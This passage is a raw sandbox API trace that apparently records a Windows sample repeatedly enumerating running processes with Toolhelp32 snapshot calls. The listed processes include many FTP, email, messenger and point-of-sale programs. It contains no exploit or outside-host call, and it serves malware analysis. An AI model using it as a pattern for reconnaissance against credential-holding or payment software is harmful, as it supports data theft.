th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0200.564] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0200.567] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0200.569] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0200.570] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0200.572] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0200.573] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0200.575] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0200.577] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0200.580] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0200.582] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0200.616] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0200.618] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0200.620] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0200.622] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0200.624] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0200.626] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0200.628] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0200.630] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0200.632] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0200.634] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0200.636] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0200.639] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0200.642] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0200.645] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0200.648] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0200.650] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0200.656] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0200.658] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0200.660] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0200.662] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0200.663] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0200.665] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0200.667] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0200.669] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0200.671] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0200.673] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0200.675] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0200.677] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0200.679] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0200.681] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0200.683] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0200.687] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0200.691] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0200.696] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0200.699] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0200.701] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0200.704] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0200.707] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0200.709] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0200.711] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0200.713] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0200.715] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0200.717] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0200.720] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0200.722] CloseHandle (hObject=0x20b0) returned 1 [0200.722] Sleep (dwMilliseconds=0x64) [0200.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2088 [0200.852] Process32First (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.854] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0200.856] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0200.858] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.861] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0200.863] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.864] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0200.866] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0200.868] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0200.870] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.871] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.873] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0200.874] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.917] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.919] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.921] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.923] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.926] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.929] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.932] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0200.934] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0200.936] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.939] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0200.941] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.944] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0200.946] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0200.948] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0200.950] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0201.016] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0201.018] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, 